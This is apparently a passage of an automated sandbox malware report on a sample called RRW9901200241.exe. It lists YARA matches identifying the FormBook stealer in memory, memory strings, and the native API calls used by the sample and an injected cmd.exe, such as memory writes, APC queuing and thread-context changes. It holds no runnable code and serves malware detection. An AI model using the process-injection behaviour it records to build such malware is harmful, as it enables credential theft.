74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.346593091.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: cmd.exe, 00000004.00000002.679859333.0000000003A2F000.00000004.00000001.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.369240129.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419D50 NtCreateFile,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419E00 NtReadFile,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419E80 NtClose,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419E4C NtReadFile,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00419F2E NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015395D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015399D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A10 NtQuerySection,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539560 NtWriteFile,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015395F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153A770 NtOpenThread,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539760 NtOpenProcess,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0153A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01539610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015396D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB4F8 NtQueryInformationToken,NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB4C0 NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002CB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C9AB4 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FDAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8D8C9
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8A8F1
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D96060
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D95580
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D9515C
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D97931
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D95AF0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D967DC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D903D2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D87D
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D985
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041DA2B
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D408
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041DCF9
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041D52D
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00402D87
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00409E30
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041E745
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041DFC5
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CF93
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D8D8C9
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D8A8F1
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D96060
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D9515C
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D97931
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D95AF0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D903D2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D95580
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D967DC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FF900
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01514120
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B1002
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015CE824
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C28EC
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150B090
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015220A0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C20A8
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C2B28
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BDBD2
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152EBB0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C22AE
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C1D55
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C2D07
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F0D20
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C25DD
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150D5E0
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01522581
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BD466
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150841F
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C1FF1
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015BD616
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01516E30
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C2EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AD803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AE040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C5CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A48E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A9CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C3506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B1969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B6550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A7190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A5226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AFA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A5E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A8AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002ACB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C6FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B5FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03062B28
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305DBD2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030503DA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304FA2B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCEBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030622AE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAB40
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAB090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306E824
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030620A8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030628EC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306DFCE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB6E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03061FF1
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305D616
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03062EF7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03062D07
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03061D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030625DD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA841F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAD5E0
